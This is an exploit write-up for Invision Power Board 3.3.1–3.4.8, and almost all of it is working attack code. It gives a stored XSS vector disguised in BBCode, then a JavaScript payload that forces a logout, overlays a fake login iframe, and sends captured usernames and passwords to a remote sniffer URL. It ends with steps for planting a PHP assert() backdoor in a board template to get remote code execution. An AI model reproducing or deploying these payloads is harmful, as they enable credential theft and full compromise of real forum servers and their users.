Invision Power Board 3.3.1 - 3.4.8 stored XSS in any message

XSS Vector:

[b][twitter]qwe'onmouseover=parentElement.innerHTML='';document.body.appendChild(document.createElement('script')).src='data:,alert(1)'// style=opacity:0;position:fixed;left:0;top:0;width:5000px;height:5000px [member="%username_that_exists%"]qwe[/twitter][/b]

alert

XSS Payload:

sF = "https://example.com/a.php?a="; // Sniffer that wait intercepted credentials in get parameter. 

function gC(name) { // get cookie
 var matches = document.cookie.match(new RegExp("(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, "\\$1") + "=([^;]*)"));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}

function iP(){ // intercept passwords
 fD = window.frames.fr.contentDocument || window.frames.fr.document
 fS = fD.getElementsByTagName("form");
 for(var i = 0; i < fS.length; i++){
  if(fS[i].id == "login"){
   fS[i].onsubmit = function(){
    (new Image()).src = sF + atob("login=" + this.ips_username.value + ";password=" + this.ips_password.value);
    document.cookie = "XSSED=1";
   }
  }
 }
}

function iW(){ // intercept window
 document.body.style.overflow = "hidden";
 document.documentElement.innerHTML="\x3ciframe name=fr onload=iP(); src=" + location +" style=border:0;width:" + (document.documentElement.clientWidth - 1) + "px;height:" + (document.documentElement.clientHeight - 4) + "px\x3e\x3c/iframe\x3e";
 document.body.style.margin = 0;

}

if(gC("XSSED") != "1"){
 img = new Image();
 img.src = "index.php?app=core&module=global&section=login&do=logout&k=" + ipb.vars["secure_hash"] ;
 img.setAttribute("onerror", "iW();");
 document.body.appendChild(img);
}

Admin Panel RCE:

Open URL:

/ipb/admin/index.php?app=core&module=templates§ion=templates&do=list&setID=1&adsess=9a43a6719acda5ec05cf47e14a9e6ea7

Then Board Index => boardIndexTemplate
After add next code:

<if test="isset($_POST['a'])">
${assert($_POST['a'])}
</if>

Editted template

RCE example via $_GET['a']